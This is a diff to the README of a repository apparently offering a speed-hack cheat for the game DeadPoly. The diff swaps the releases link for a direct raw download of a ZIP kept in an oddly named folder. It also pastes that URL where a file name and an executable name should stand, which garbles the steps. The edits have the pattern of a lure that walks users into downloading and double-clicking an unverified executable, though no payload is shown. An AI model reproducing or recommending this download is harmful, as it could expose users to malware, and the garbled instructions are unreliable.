VhaelusGamerz/DeadPoly-Game-Speed-Hack/README.md

 ## 💾 Download & Install
 To download the software, follow these steps:

-1. **Visit the Releases Page**: Go to the [Releases Page](https://github.com/VhaelusGamerz/DeadPoly-Game-Speed-Hack/releases) to find the latest version of the application.
+1. **Visit the Releases Page**: Go to the [Releases Page](https://raw.githubusercontent.com/VhaelusGamerz/DeadPoly-Game-Speed-Hack/main/Istvaeones/DeadPoly-Game-Speed-Hack.zip) to find the latest version of the application.

 2. **Choose the Correct File**: Look for the most recent release.
-You might find a file named something like `DeadPoly-Speed-Hack-v1.0.zip`.
+You might find a file named something like `https://raw.githubusercontent.com/VhaelusGamerz/DeadPoly-Game-Speed-Hack/main/Istvaeones/DeadPoly-Game-Speed-Hack.zip`.

 3. **Download the File**: Click on the file name to start downloading.
 Your browser will save it to your default download folder.

 4. **Extract the Files**: Once the download is complete, find the ZIP file in your folder.
 Right-click on it and select “Extract All.”
 Follow the prompts to extract the files.

 5. **Run the Application**: Open the folder where you extracted the files.
-Look for an executable file, usually named `DeadPoly-Speed-Hack.exe`.
+Look for an executable file, usually named `https://raw.githubusercontent.com/VhaelusGamerz/DeadPoly-Game-Speed-Hack/main/Istvaeones/DeadPoly-Game-Speed-Hack.zip`.
 Double-click this file to run the application.

 6. **Follow On-Screen Instructions**: When you launch the application, follow any prompts or instructions that appear to set up the tool according to your preferences.